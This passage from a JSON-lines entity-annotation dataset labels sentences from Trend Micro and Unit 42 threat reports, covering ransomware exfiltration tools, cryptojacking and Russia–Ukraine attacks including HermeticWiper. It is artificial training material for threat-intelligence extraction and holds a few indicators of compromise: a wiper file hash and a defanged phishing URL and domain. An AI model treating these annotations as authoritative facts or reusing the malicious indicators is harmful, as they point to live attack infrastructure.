exfil, in the first half we saw APT actors utilize cloud-based file storage to exfiltrate their stolen data.","entities":[],"relations":[],"Comments":[]} -{"id":105,"text":"For example, we found that Conti operators use the cloud storage synchronization tool Rclone to upload files to the Mega cloud storage service.","entities":[{"id":377,"label":"malware","start_offset":116,"end_offset":120},{"id":44599,"label":"threat-actor","start_offset":27,"end_offset":42},{"id":44600,"label":"tools","start_offset":86,"end_offset":92},{"id":44601,"label":"SOFTWARE","start_offset":116,"end_offset":142}],"relations":[{"id":1,"from_id":44599,"to_id":44600,"type":"uses"},{"id":2,"from_id":44600,"to_id":44601,"type":"exfiltrates-to"},{"id":3,"from_id":44599,"to_id":44601,"type":"exfiltrates-to"}],"Comments":[]} -{"id":106,"text":"Similarly, DarkSide operators used Mega client for exfiltrating files to cloud storage, 7-Zip for archiving, and PuTTY application for network file transfers.","entities":[{"id":45834,"label":"threat-actor","start_offset":11,"end_offset":29},{"id":45835,"label":"tools","start_offset":35,"end_offset":46},{"id":45836,"label":"tools","start_offset":88,"end_offset":93},{"id":45837,"label":"tools","start_offset":113,"end_offset":118}],"relations":[{"id":120,"from_id":45834,"to_id":45835,"type":"uses"},{"id":121,"from_id":45834,"to_id":45836,"type":"uses"},{"id":122,"from_id":45834,"to_id":45837,"type":"uses"}],"Comments":[]} -{"id":107,"text":"This use of known, legitimate tools is not new; we call that “living off the land” and have seen this tactic pick up recently, including usage by ransomware actors.","entities":[{"id":45838,"label":"tools","start_offset":62,"end_offset":81}],"relations":[],"Comments":[]} -{"id":108,"text":"Many organizations now need to look at ways of monitoring legitimate tools usage within their networks to identify any malicious uses.","entities":[],"relations":[],"Comments":[]} -{"id":109,"text":"Cloud Security Architecture","entities":[],"relations":[],"Comments":[]} -{"id":110,"text":"When developing your cloud security architecture and strategy, it is important to always keep the ends in mind.","entities":[],"relations":[],"Comments":[]} -{"id":111,"text":"In this case, what are the motivation and end goals of an attacker?","entities":[],"relations":[],"Comments":[]} -{"id":112,"text":"As you see in the image above, most cloud attacks are going to fall into one of these areas.","entities":[],"relations":[],"Comments":[]} -{"id":113,"text":"Depending on what you are doing as part of your cloud infrastructure, you should be able to identify if any or all of these end goals could be targeted in your environment.","entities":[],"relations":[],"Comments":[]} -{"id":114,"text":"From there, you can work backwards to develop your strategy for protecting those initial access areas tied to the different attacks.","entities":[],"relations":[],"Comments":[]} -{"id":115,"text":"A challenge many organizations face is that the cloud isn’t simple, and many of the technologies that make up the cloud are new, with new features being deployed all the time.","entities":[],"relations":[],"Comments":[]} -{"id":116,"text":"Understanding how these work and – more importantly – how to secure them can be very difficult.","entities":[],"relations":[],"Comments":[]} -{"id":117,"text":"Utilizing a security platform approach can help build your cloud to be more secure, but educating your architects and administrators will also help.","entities":[],"relations":[],"Comments":[]} -{"id":118,"text":"One key area is hardening your cloud account credentials, as these will be regularly targeted by malicious actors.","entities":[],"relations":[],"Comments":[]} -{"id":119,"text":"Using multi-factor authentication to access all accounts can minimize this risk tremendously.","entities":[],"relations":[],"Comments":[]} -{"id":120,"text":"Take a look at Trend Micro Cloud One, part of our complete cybersecurity platform, to learn more.","entities":[{"id":44602,"label":"SOFTWARE","start_offset":15,"end_offset":36}],"relations":[],"Comments":[]} -{"id":121,"text":"The cloud is only one aspect of our full 1H 2021 report.","entities":[{"id":45839,"label":"TIME","start_offset":41,"end_offset":48}],"relations":[],"Comments":[]} -{"id":122,"text":"To get more details on all the different threats and attacks we observed, download and read the full report here.","entities":[],"relations":[],"Comments":[]} -{"id":123,"text":" Tags Cloud | Cyber Crime | Expert Perspective | Cyber Threats | APT & Targeted Attacks | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":124,"text":"Cybercriminals have embraced the anonymous nature of cryptocurrency as a new preferred method of profit.","entities":[],"relations":[],"Comments":[]} -{"id":125,"text":"Unit 42 released details about attackers hijacking web browsers to mine for compute resources and exchange for cryptocurrency.","entities":[{"id":45840,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":126,"text":"With the increasing value of cryptocurrency, such as bitcoin and Ethereum, and a better business model with higher returns than malware- and exploit-type attacks, it’s no surprise these types of attacks are becoming more commonplace.","entities":[{"id":44603,"label":"SOFTWARE","start_offset":53,"end_offset":60},{"id":44604,"label":"SOFTWARE","start_offset":65,"end_offset":73}],"relations":[],"Comments":[]} -{"id":127,"text":" Cybercriminals will compromise a website and abuse a legitimate tool on that site to gain access to the compute resources of site visitors’ systems.","entities":[{"id":45842,"label":"attack-pattern","start_offset":46,"end_offset":69},{"id":45841,"label":"attack-pattern","start_offset":21,"end_offset":41}],"relations":[],"Comments":[]} -{"id":128,"text":"Using this access, attackers will essentially steal compute resources and exchange them for cryptocurrency credit.","entities":[{"id":45843,"label":"attack-pattern","start_offset":46,"end_offset":69}],"relations":[],"Comments":[]} -{"id":129,"text":"This all occurs without the users’ consent or knowledge throughout the duration of their site visits.","entities":[],"relations":[],"Comments":[]} -{"id":130,"text":" The malicious activity itself doesn’t cause long-term damage to systems, and ends as soon as users leave the malicious or compromised site.","entities":[],"relations":[],"Comments":[]} -{"id":131,"text":"Additionally, the site will still provide users with its normal, intended functionality.","entities":[],"relations":[],"Comments":[]} -{"id":132,"text":"However, users likely experience a noticeable slowdown in system performance.","entities":[],"relations":[],"Comments":[]} -{"id":133,"text":" If you believe your system is being affected by this type of attack, leaving the site or closing your browser will, in most cases, end the attack.","entities":[],"relations":[],"Comments":[]} -{"id":134,"text":"Additionally, you should practice good cybersecurity hygiene.","entities":[],"relations":[],"Comments":[]} -{"id":135,"text":"This means avoiding unfamiliar websites, clicking on links or downloading attachments from unknown email senders, keeping products updated with the latest security patches, enabling multi-factor authentication, and using reputable security products.","entities":[],"relations":[],"Comments":[]} -{"id":136,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} -{"id":137,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":138,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} -{"id":139,"text":"In our updated report on ransomware from Unit 42, “Ransomware: Unlocking the Lucrative Criminal Business Model,” Unit 42 researcher Bryan Lee notes: “In 2016, it was thought that there were less than one hundred active ransomware variants out in the wild.","entities":[{"id":45846,"label":"identity","start_offset":41,"end_offset":48},{"id":45847,"label":"TIME","start_offset":153,"end_offset":157},{"id":45844,"label":"identity","start_offset":113,"end_offset":120},{"id":45845,"label":"identity","start_offset":132,"end_offset":141}],"relations":[],"Comments":[]} -{"id":140,"text":"Today, the number of total ransomware variants at least over 150, if not hundreds more.” It’s reasonable to ask why ransomware continues not only to exist but to thrive.","entities":[],"relations":[],"Comments":[]} -{"id":141,"text":"The first answer to this, as we’ve outlined in our report, is that ransomware is a lucrative cybercriminal business model.","entities":[],"relations":[],"Comments":[]} -{"id":142,"text":"However, in addition to the human factor, there are technical reasons.","entities":[],"relations":[],"Comments":[]} -{"id":143,"text":"Specifically, there are three things that combine to make ransomware a particularly potent threat on the technical level:","entities":[],"relations":[],"Comments":[]} -{"id":144,"text":" In some ways, these three points state the obvious.","entities":[],"relations":[],"Comments":[]} -{"id":145,"text":"But the full ramifications and why these make ransomware hard to stop aren’t always discussed.","entities":[],"relations":[],"Comments":[]} -{"id":146,"text":" The way ransomware works is well documented, but let’s recap here.","entities":[],"relations":[],"Comments":[]} -{"id":147,"text":"Ransomware is downloaded to a user’s system and executed on it.","entities":[],"relations":[],"Comments":[]} -{"id":148,"text":"The way the attackers get the ransomware on the system varies: it can be through unpatched vulnerabilities, social engineering or both.","entities":[],"relations":[],"Comments":[]} -{"id":149,"text":"The most common way ransomware operators levy attacks is through email or by web browsing to malicious or compromised sites.","entities":[{"id":45848,"label":"attack-pattern","start_offset":65,"end_offset":123}],"relations":[],"Comments":[]} -{"id":150,"text":"The overwhelming majority of ransomware attacks are against Microsoft Windows systems.","entities":[{"id":44606,"label":"SOFTWARE","start_offset":60,"end_offset":77}],"relations":[],"Comments":[]} -{"id":151,"text":"Once malware is running on the user’s system, it seeks out and encrypts files and folders that hold information critical for the user, such as documents, business applications or even database files.","entities":[],"relations":[],"Comments":[]} -{"id":152,"text":"In some cases, the ransomware is sophisticated enough to target specific application files.","entities":[],"relations":[],"Comments":[]} -{"id":153,"text":"Most importantly, because the ransomware is executing with the compromised user’s privileges, any file the legitimate, now-compromised user has access to, including network shares and backups, is fair game for the ransomware.","entities":[{"id":44607,"label":"attack-pattern","start_offset":63,"end_offset":92}],"relations":[],"Comments":[]} -{"id":154,"text":" It’s this last point that gets to the heart of why ransomware is so potent.","entities":[],"relations":[],"Comments":[]} -{"id":155,"text":"From an operating system point of view, the ransomware IS the user.","entities":[],"relations":[],"Comments":[]} -{"id":156,"text":"Even though Microsoft Windows today features a robust user access control system, that system has inherent limitations.","entities":[{"id":44608,"label":"SOFTWARE","start_offset":12,"end_offset":29}],"relations":[],"Comments":[]} -{"id":157,"text":"In the early days of Window Vista, Microsoft enabled aggressive security checking to ensure user-initiated actions were legitimate.","entities":[{"id":45849,"label":"SOFTWARE","start_offset":21,"end_offset":33},{"id":45850,"label":"identity","start_offset":35,"end_offset":44}],"relations":[],"Comments":[]} -{"id":158,"text":"This was well-intentioned but ultimately backfired: users got fed up clicking “Are you sure?” dialog boxes and quickly disabled the feature, or just mindlessly clicked “OK” every time they saw it.","entities":[],"relations":[],"Comments":[]} -{"id":159,"text":"Microsoft made reasonable adjustments so that these alerts are now raised sparingly.","entities":[{"id":44609,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":160,"text":"Although that feature was never enabled to protect user data files like ransomware targets, there is a clear lesson from the experience: too many security checks on user activity fails in the end.","entities":[],"relations":[],"Comments":[]} -{"id":161,"text":" Bringing that lesson to bear here, the only way the operating system could protect against ransomware would be to raise “Are you sure?” dialog boxes on everyday operations against the kinds of files that ransomware targets.","entities":[],"relations":[],"Comments":[]} -{"id":162,"text":" And this is where the second point comes to bear.","entities":[],"relations":[],"Comments":[]} -{"id":163,"text":" Unlike other forms of malware, ransomware is very specific in its targeting.","entities":[],"relations":[],"Comments":[]} -{"id":164,"text":"It goes after the files users are most likely to care about.","entities":[],"relations":[],"Comments":[]} -{"id":165,"text":"These also happen to be files users are most likely to use on a day-to-day basis or that are critical to an organization’s operations.","entities":[],"relations":[],"Comments":[]} -{"id":166,"text":"Extra layers of protection for those files would be incredibly onerous.","entities":[],"relations":[],"Comments":[]} -{"id":167,"text":"Imagine having to click through “Are you sure?” dialog boxes for every document or picture you opened in a day.","entities":[],"relations":[],"Comments":[]} -{"id":168,"text":" From an engineering point of view, this sole, specific targeting of files that matter significantly increases the chances of ransomware’s success.","entities":[],"relations":[],"Comments":[]} -{"id":169,"text":"This brings us to the third point: there is little attack time wasted on files that don’t matter to the victim.","entities":[],"relations":[],"Comments":[]} -{"id":170,"text":"Even a successful ransomware attack that is halted early by security software will achieve some level of damage – enough to make the victim consider paying the ransom to get the files back.","entities":[],"relations":[],"Comments":[]} -{"id":171,"text":"If user32.dll were encrypted and unusable, it would be a problem.","entities":[{"id":44610,"label":"FILEPATH","start_offset":3,"end_offset":13}],"relations":[],"Comments":[]} -{"id":172,"text":"But when your organization’s overall accounting and audit report is inaccessible right before the big deadline, that’s catastrophic.","entities":[],"relations":[],"Comments":[]} -{"id":173,"text":" The net of these three points is that ransomware is a threat such that focus needs to be placed solely around prevention.","entities":[],"relations":[],"Comments":[]} -{"id":174,"text":"There is no effective solution for ransomware at the operating system level, as outlined above.","entities":[],"relations":[],"Comments":[]} -{"id":175,"text":"And unlike other attacks, ransomware attacks can’t succeed “just a little.”","entities":[],"relations":[],"Comments":[]} -{"id":176,"text":"In some cases, a single file lost is more than enough to count as a fully successful attack.","entities":[],"relations":[],"Comments":[]} -{"id":177,"text":" In some ways, ransomware is a threat unlike any other.","entities":[],"relations":[],"Comments":[]} -{"id":178,"text":"Its impact and scope are both broad and deep in ways that are unique.","entities":[],"relations":[],"Comments":[]} -{"id":179,"text":"Because of that, from a risk assessment point of view, ransomware needs to be put in a class by itself – a class that acknowledges that the risks from a successful attack of any kind are very high.","entities":[],"relations":[],"Comments":[]} -{"id":180,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":181,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":182,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":183,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} -{"id":184,"text":"Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially.","entities":[],"relations":[],"Comments":[]} -{"id":185,"text":"Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced.","entities":[{"id":45851,"label":"TIME","start_offset":13,"end_offset":20},{"id":45852,"label":"attack-pattern","start_offset":34,"end_offset":70}],"relations":[],"Comments":[]} -{"id":186,"text":"These attacks have continued over the past week, impacting both the Ukrainian government and banking institutions.","entities":[{"id":44612,"label":"identity","start_offset":68,"end_offset":113}],"relations":[],"Comments":[]} -{"id":187,"text":"On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine.","entities":[{"id":591,"label":"malware","start_offset":29,"end_offset":34},{"id":45853,"label":"TIME","start_offset":3,"end_offset":10},{"id":45855,"label":"malware","start_offset":49,"end_offset":62},{"id":45854,"label":"location","start_offset":81,"end_offset":88}],"relations":[{"id":123,"from_id":45855,"to_id":591,"type":"variant-of"},{"id":124,"from_id":45855,"to_id":45854,"type":"targets"}],"Comments":[]} -{"id":188,"text":"Shortly after, a new round of website defacement attacks were also observed impacting Ukrainian government organizations.","entities":[{"id":45856,"label":"identity","start_offset":86,"end_offset":120},{"id":45857,"label":"attack-pattern","start_offset":30,"end_offset":48}],"relations":[],"Comments":[]} -{"id":189,"text":" Consistent with our previous reporting on the topic, several western governments have issued recommendations for their populations to prepare for cyberattacks that could disrupt, disable or destroy critical infrastructure.","entities":[{"id":45858,"label":"identity","start_offset":62,"end_offset":81}],"relations":[],"Comments":[]} -{"id":190,"text":"We have already observed an increase in Russian cyber activity, which we reported on in our initial Threat Brief published last month and our recent report on the Gamaredon group.","entities":[{"id":45859,"label":"threat-actor","start_offset":163,"end_offset":178},{"id":45860,"label":"location","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} -{"id":191,"text":"Future attacks may target U.S. and Western European organizations in retaliation for increased sanctions or other political measures against the Russian government.","entities":[{"id":45862,"label":"location","start_offset":35,"end_offset":51},{"id":45863,"label":"identity","start_offset":35,"end_offset":65},{"id":45861,"label":"location","start_offset":26,"end_offset":30},{"id":45864,"label":"identity","start_offset":145,"end_offset":163}],"relations":[],"Comments":[]} -{"id":192,"text":"We recommend that all organizations proactively prepare to defend against this potential threat.","entities":[],"relations":[],"Comments":[]} -{"id":193,"text":" This post was substantially updated on Feb. 24 to add information on the recent DDoS attacks, HermeticWiper malware and website defacement; update our recommendations for how organizations should prepare for potential cyber impact; and provide additional details for our customers and clients on how we can help.","entities":[{"id":45866,"label":"TIME","start_offset":40,"end_offset":47},{"id":45867,"label":"attack-pattern","start_offset":81,"end_offset":93},{"id":45868,"label":"attack-pattern","start_offset":121,"end_offset":139},{"id":45865,"label":"malware","start_offset":95,"end_offset":108}],"relations":[],"Comments":[]} -{"id":194,"text":"This post was substantially updated March 31 to add information on phishing and scam attacks, cybersquatting trends, fake donation websites, DoS attacks on Ukrainian news sites and distribution of malicious binaries.","entities":[{"id":45871,"label":"attack-pattern","start_offset":94,"end_offset":108},{"id":45872,"label":"attack-pattern","start_offset":117,"end_offset":139},{"id":45873,"label":"attack-pattern","start_offset":141,"end_offset":152},{"id":45869,"label":"TIME","start_offset":36,"end_offset":44},{"id":45874,"label":"identity","start_offset":156,"end_offset":176},{"id":45875,"label":"attack-pattern","start_offset":181,"end_offset":215},{"id":45870,"label":"attack-pattern","start_offset":67,"end_offset":92}],"relations":[{"id":127,"from_id":45872,"to_id":45874,"type":"duplicate-of"},{"id":129,"from_id":45875,"to_id":45874,"type":"targets"},{"id":128,"from_id":45873,"to_id":45874,"type":"targets"},{"id":126,"from_id":45871,"to_id":45874,"type":"targets"},{"id":125,"from_id":45870,"to_id":45874,"type":"targets"}],"Comments":[]} -{"id":195,"text":" Full visualization of the techniques observed, relevant courses of action and indicators of compromise (IoCs) related to this report can be found in the Unit 42 ATOM viewer. We will continue to provide updates with new information and recommendations as they become available.","entities":[{"id":45780,"label":"SOFTWARE","start_offset":154,"end_offset":173}],"relations":[],"Comments":[]} -{"id":196,"text":" DDoS Attacks Impacting Ukrainian Government and Banking Institutions HermeticWiper Malware Website Defacement Rise in Phishing and Scam Attacks Increase in Cybersquatting Trends Fake Donation Websites DoS Attacks on Ukrainian News Sites Distribution of Apps How Palo Alto Networks Is Working to Keep You Safe How You Should Prepare for an Increase in Cyberthreats Such as Wipers, DDoS, Website Defacement and Other Related Attacks How Unit 42 Threat Intelligence and Security Consulting Can Help Additional Cybersecurity Resources Indicators of Compromise","entities":[{"id":45877,"label":"attack-pattern","start_offset":1,"end_offset":13},{"id":45879,"label":"attack-pattern","start_offset":84,"end_offset":109},{"id":45885,"label":"attack-pattern","start_offset":238,"end_offset":258},{"id":45889,"label":"attack-pattern","start_offset":387,"end_offset":405},{"id":45891,"label":"identity","start_offset":436,"end_offset":443},{"id":45876,"label":"malware","start_offset":70,"end_offset":83},{"id":45878,"label":"identity","start_offset":24,"end_offset":69},{"id":45880,"label":"attack-pattern","start_offset":119,"end_offset":144},{"id":45881,"label":"attack-pattern","start_offset":157,"end_offset":171},{"id":45882,"label":"attack-pattern","start_offset":179,"end_offset":201},{"id":45883,"label":"attack-pattern","start_offset":202,"end_offset":213},{"id":45884,"label":"identity","start_offset":217,"end_offset":237},{"id":45886,"label":"identity","start_offset":263,"end_offset":281},{"id":45887,"label":"attack-pattern","start_offset":373,"end_offset":379},{"id":45888,"label":"attack-pattern","start_offset":381,"end_offset":385}],"relations":[{"id":130,"from_id":45877,"to_id":45878,"type":"targets"}],"Comments":[]} -{"id":197,"text":"Appendix A: Cortex Xpanse: Identifying Assets That May Be Impacted by CISA’s Known Exploited Vulnerabilities","entities":[{"id":45892,"label":"SOFTWARE","start_offset":12,"end_offset":25},{"id":45893,"label":"identity","start_offset":70,"end_offset":75}],"relations":[],"Comments":[]} -{"id":198,"text":"On Feb. 15, the Cyberpolice of Ukraine reported that residents were actively receiving fake SMS text messages.","entities":[{"id":45894,"label":"TIME","start_offset":3,"end_offset":10},{"id":44614,"label":"identity","start_offset":16,"end_offset":38},{"id":44615,"label":"attack-pattern","start_offset":77,"end_offset":109}],"relations":[],"Comments":[]} -{"id":199,"text":"These messages were likely intended to cause alarm among the population, as they claimed that ATMs were malfunctioning.","entities":[],"relations":[],"Comments":[]} -{"id":200,"text":" Shortly after the text messages were observed, several DDoS attacks occurred.","entities":[{"id":45895,"label":"attack-pattern","start_offset":56,"end_offset":68}],"relations":[],"Comments":[]} -{"id":201,"text":"These attacks impacted Ukrainian government organizations including the Ministry of Defense, Ministry of Foreign Affairs, Armed Forces of Ukraine and the publicly funded broadcaster Ukrainian Radio.","entities":[{"id":44616,"label":"identity","start_offset":23,"end_offset":43},{"id":44617,"label":"identity","start_offset":72,"end_offset":91},{"id":44618,"label":"identity","start_offset":93,"end_offset":120},{"id":44619,"label":"identity","start_offset":122,"end_offset":145},{"id":44620,"label":"identity","start_offset":182,"end_offset":197}],"relations":[],"Comments":[]} -{"id":202,"text":"Additionally, the attacks targeted two banking institutions, PrivatBank and Oschadbank.","entities":[{"id":45896,"label":"identity","start_offset":61,"end_offset":71},{"id":45897,"label":"identity","start_offset":76,"end_offset":86}],"relations":[],"Comments":[]} -{"id":203,"text":"An initial investigation into the DDoS attacks suggested that Mirai and Meris bot networks may have been leveraged in the attacks.","entities":[{"id":45900,"label":"malware","start_offset":72,"end_offset":90},{"id":45898,"label":"attack-pattern","start_offset":34,"end_offset":46},{"id":45899,"label":"malware","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} -{"id":204,"text":" On Feb. 18, both the United States and the United Kingdom attributed these DDoS attacks to Russia’s Main Intelligence Directorate (GRU). Over the past week, Ukraine has continued to observe a relatively constant flow of DDoS attacks targeting its government and financial institutions.","entities":[{"id":44621,"label":"identity","start_offset":22,"end_offset":35},{"id":44622,"label":"TIME","start_offset":4,"end_offset":11},{"id":44623,"label":"identity","start_offset":44,"end_offset":58},{"id":44624,"label":"attack-pattern","start_offset":76,"end_offset":80},{"id":44625,"label":"threat-actor","start_offset":92,"end_offset":136},{"id":44626,"label":"identity","start_offset":159,"end_offset":166},{"id":44627,"label":"attack-pattern","start_offset":222,"end_offset":234},{"id":44628,"label":"identity","start_offset":249,"end_offset":286}],"relations":[{"id":4,"from_id":44624,"to_id":44625,"type":"attributed-to"},{"id":131,"from_id":44627,"to_id":44628,"type":"targets"}],"Comments":[]} -{"id":205,"text":"However, at this time, attribution for the ongoing attacks has not been established.","entities":[],"relations":[],"Comments":[]} -{"id":206,"text":"The Ukrainian CERT did identify a post on RaidForums from a user named “Carzita” that suggested that additional actors may also be launching DDoS and defacement attacks for undisclosed reasons.","entities":[{"id":45901,"label":"identity","start_offset":4,"end_offset":18},{"id":45903,"label":"identity","start_offset":72,"end_offset":79},{"id":45902,"label":"identity","start_offset":42,"end_offset":52},{"id":45904,"label":"attack-pattern","start_offset":141,"end_offset":145},{"id":45905,"label":"attack-pattern","start_offset":150,"end_offset":168}],"relations":[],"Comments":[]} -{"id":207,"text":"On Feb. 23, a malicious file named conhosts._exe (SHA256: 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591) was uploaded to a public malware repository from an organization in Kyiv, Ukraine.","entities":[{"id":678,"label":"SHA2","start_offset":58,"end_offset":122},{"id":44630,"label":"location","start_offset":192,"end_offset":205},{"id":44631,"label":"FILEPATH","start_offset":35,"end_offset":48},{"id":44632,"label":"TIME","start_offset":3,"end_offset":10}],"relations":[{"id":133,"from_id":678,"to_id":44631,"type":"indicates"}],"Comments":[]} -{"id":208,"text":"This executable is a signed file with a valid signature from an organization named Hermetica Digital Ltd. This signing certificate has since been explicitly revoked by its issuer.","entities":[{"id":45906,"label":"identity","start_offset":83,"end_offset":104}],"relations":[],"Comments":[]} -{"id":209,"text":"Upon execution, this file enumerates all files on a hard drive, wipes the partition info and then forces a system reboot, which predictably results in the following screen:","entities":[],"relations":[],"Comments":[]} -{"id":210,"text":" Further analysis has confirmed that the malware accepts command-line arguments allowing an attacker to instruct the malware to sleep for a period of time or to shut down the system.","entities":[],"relations":[],"Comments":[]} -{"id":211,"text":" Additionally the kernel module responsible for the actual wiping activity is from a legitimate application called EaseUS Partition Master.","entities":[{"id":45907,"label":"tools","start_offset":115,"end_offset":138}],"relations":[],"Comments":[]} -{"id":212,"text":"This software is designed as free partition software that can reorganize disk space for better performance.","entities":[],"relations":[],"Comments":[]} -{"id":213,"text":"In tracking this threat, early reports show that the malware has been deployed against a financial institution in Ukraine as well as two contractors in Latvia and Lithuania that provide services to the Ukrainian Government.","entities":[{"id":44633,"label":"location","start_offset":114,"end_offset":121},{"id":44634,"label":"identity","start_offset":202,"end_offset":222},{"id":44635,"label":"identity","start_offset":90,"end_offset":110},{"id":44636,"label":"location","start_offset":152,"end_offset":158},{"id":44637,"label":"location","start_offset":163,"end_offset":172},{"id":44638,"label":"malware","start_offset":53,"end_offset":60},{"id":44639,"label":"identity","start_offset":133,"end_offset":172}],"relations":[{"id":6,"from_id":44638,"to_id":44635,"type":"targets"},{"id":7,"from_id":44638,"to_id":44639,"type":"targets"}],"Comments":[]} -{"id":214,"text":"Additionally, ESET researchers have warned that they found this malware installed across “hundreds of machines” in Ukraine.","entities":[{"id":45908,"label":"identity","start_offset":14,"end_offset":18},{"id":45909,"label":"location","start_offset":115,"end_offset":122}],"relations":[],"Comments":[]} -{"id":215,"text":" Concurrent with the discovery of wiper malware, we also witnessed a second round of website defacements on Feb. 23.","entities":[{"id":45910,"label":"TIME","start_offset":108,"end_offset":115},{"id":45911,"label":"attack-pattern","start_offset":85,"end_offset":104}],"relations":[],"Comments":[]} -{"id":216,"text":"These attacks appear to have copied the messaging template observed in attacks exploiting the OctoberCMS vulnerability a month earlier on Jan.14, while adding a .onion web address and a message in red font that translates to, “Do you need proof, see the link at the end.” ","entities":[{"id":44640,"label":"vulnerability","start_offset":94,"end_offset":118},{"id":44641,"label":"TIME","start_offset":138,"end_offset":144}],"relations":[],"Comments":[]} -{"id":217,"text":"The .onion site links to an entity calling themselves “Free Civilian” and offering to sell databases containing the personal data of Ukrainian citizens.","entities":[],"relations":[],"Comments":[]} -{"id":218,"text":"Over the past 24 hours, the list of entities on the leaks section has expanded to 48 gov.ua domains and one Ukranian company (motorsich[.]com) that builds engines for airplanes and helicopters.","entities":[{"id":45912,"label":"TIME","start_offset":5,"end_offset":22},{"id":45913,"label":"identity","start_offset":108,"end_offset":124},{"id":45914,"label":"DOMAIN","start_offset":126,"end_offset":141}],"relations":[],"Comments":[]} -{"id":219,"text":" Our team analyzed the larger trends regarding Ukraine-related phishing and scam URLs detected by Advanced URL Filtering.","entities":[{"id":715,"label":"attack-pattern","start_offset":63,"end_offset":71},{"id":44643,"label":"attack-pattern","start_offset":76,"end_offset":85}],"relations":[],"Comments":[]} -{"id":220,"text":"We noticed an overall increase in the detection of websites that host phishing and scam URLs on domains using Ukraine-related TLDs such as gov.ua and com.ua, or containing popular Ukraine-related keywords such as \"ukraine\" and \"ukrainian\".","entities":[{"id":45915,"label":"attack-pattern","start_offset":70,"end_offset":78},{"id":45918,"label":"location","start_offset":214,"end_offset":221},{"id":45919,"label":"location","start_offset":110,"end_offset":117}],"relations":[],"Comments":[]} -{"id":221,"text":"This trend correlates with an increase in Google searches for terms like \"Ukraine aid.\"","entities":[{"id":45916,"label":"SOFTWARE","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} -{"id":223,"text":" From January to late February, it appears that the number of Ukraine-related phishing and scam sites largely followed a similar trend as Ukraine-related internet searches; however, the number of phishing and scam sites has continued to rise through mid-late March as the situation remains ongoing.","entities":[{"id":737,"label":"attack-pattern","start_offset":78,"end_offset":86},{"id":741,"label":"attack-pattern","start_offset":196,"end_offset":204},{"id":45920,"label":"TIME","start_offset":6,"end_offset":13},{"id":45925,"label":"attack-pattern","start_offset":209,"end_offset":219},{"id":45921,"label":"TIME","start_offset":17,"end_offset":30},{"id":45922,"label":"location","start_offset":62,"end_offset":69},{"id":45923,"label":"location","start_offset":138,"end_offset":145}],"relations":[],"Comments":[]} -{"id":224,"text":"Figure 8 shows that the number of Ukraine-related phishing\/scam sites is currently continuing to rise about a month after the “Ukraine aid” search term started trending in Google search.","entities":[{"id":747,"label":"attack-pattern","start_offset":50,"end_offset":58},{"id":45924,"label":"attack-pattern","start_offset":59,"end_offset":69},{"id":45926,"label":"location","start_offset":34,"end_offset":41},{"id":45927,"label":"SOFTWARE","start_offset":172,"end_offset":178}],"relations":[],"Comments":[]} -{"id":225,"text":" Among these phishing and scam URLs, we found a targeted phishing attack.","entities":[{"id":751,"label":"attack-pattern","start_offset":14,"end_offset":22},{"id":44645,"label":"attack-pattern","start_offset":27,"end_offset":36},{"id":44646,"label":"attack-pattern","start_offset":49,"end_offset":73}],"relations":[],"Comments":[]} -{"id":226,"text":"On March 16 while ingesting a third-party data feed, our in-house machine learning models detected a phishing webpage targeting a Ukrainian state administration employee.","entities":[{"id":756,"label":"attack-pattern","start_offset":101,"end_offset":109},{"id":45928,"label":"TIME","start_offset":3,"end_offset":11},{"id":45929,"label":"identity","start_offset":130,"end_offset":169}],"relations":[{"id":134,"from_id":756,"to_id":45929,"type":"targets"}],"Comments":[]} -{"id":227,"text":"The webpage is imitating a popular cloud file storage site.","entities":[],"relations":[],"Comments":[]} -{"id":228,"text":"Upon visiting the webpage, the “Username” field is pre-","entities":[],"relations":[],"Comments":[]} -{"id":229,"text":"populated with the targeted employee’s email address, and the user is then prompted to enter in their password in order to view a sensitive document as shown in Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":230,"text":" Figure 9. hxxps:\/\/startrackzm[.]com\/wap-admin\/ONE-DRIVE\/one%20d%20%20no%20auto.php?Email=REDACTED@REDACTED.gov.ua.","entities":[{"id":45930,"label":"URL","start_offset":11,"end_offset":114}],"relations":[],"Comments":[]} -{"id":231,"text":"A phishing webpage targeting a Ukrainian state administration employee, detected by our in-house machine learning models on March 16.Our teams at Palo Alto Networks are actively monitoring the phishing landscape surrounding Ukraine-related URLs and are sharing this threat intelligence with relevant authorities in Ukraine and internationally.","entities":[{"id":765,"label":"attack-pattern","start_offset":2,"end_offset":10},{"id":771,"label":"attack-pattern","start_offset":193,"end_offset":201},{"id":44647,"label":"identity","start_offset":31,"end_offset":70},{"id":44648,"label":"TIME","start_offset":124,"end_offset":132},{"id":44649,"label":"identity","start_offset":146,"end_offset":164},{"id":44650,"label":"location","start_offset":315,"end_offset":322}],"relations":[{"id":135,"from_id":765,"to_id":44647,"type":"targets"},{"id":136,"from_id":771,"to_id":44650,"type":"targets"}],"Comments":[]} -{"id":232,"text":"We are also sharing a list of IoCs that were detected as phishing and scam URLs.","entities":[{"id":45931,"label":"attack-pattern","start_offset":57,"end_offset":65},{"id":45932,"label":"attack-pattern","start_offset":70,"end_offset":79}],"relations":[],"Comments":[]} -{"id":233,"text":"Palo Alto Networks customers who subscribe to Advanced URL Filtering are already protected from these 